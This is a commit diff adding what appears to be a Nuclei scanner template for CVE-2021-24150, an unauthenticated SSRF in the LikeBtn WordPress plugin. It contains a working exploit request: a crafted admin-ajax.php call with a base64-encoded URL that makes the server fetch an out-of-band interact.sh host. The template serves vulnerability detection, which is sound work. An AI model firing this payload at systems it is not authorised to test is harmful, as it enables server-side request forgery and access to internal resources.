Added template for CVE-2021-24150

2022-10-06 07:22:13 -07:00 · 2022-10-06 07:22:13 -07:00 · a98649e7e4
parent 515a74f482
commit a98649e7e4
1 changed files with 33 additions and 0 deletions
--- a/cves/2021/CVE-2021-24150.yaml
+++ b/cves/2021/CVE-2021-24150.yaml
@ -0,0 +1,33 @@
+id: CVE-2021-24150
+
+info:
+  name: Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF
+  author: theamanrawat
+  severity: high
+  description: |
+    The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).
+  reference:
+    - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24150
+    - https://wordpress.org/plugins/likebtn-like-button/
+  classification:
+    cve-id: CVE-2021-24150
+  metadata:
+    verified: true
+  tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauthenticated
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Interactsh Server"
+
+      - type: status
+        status:
+          - 200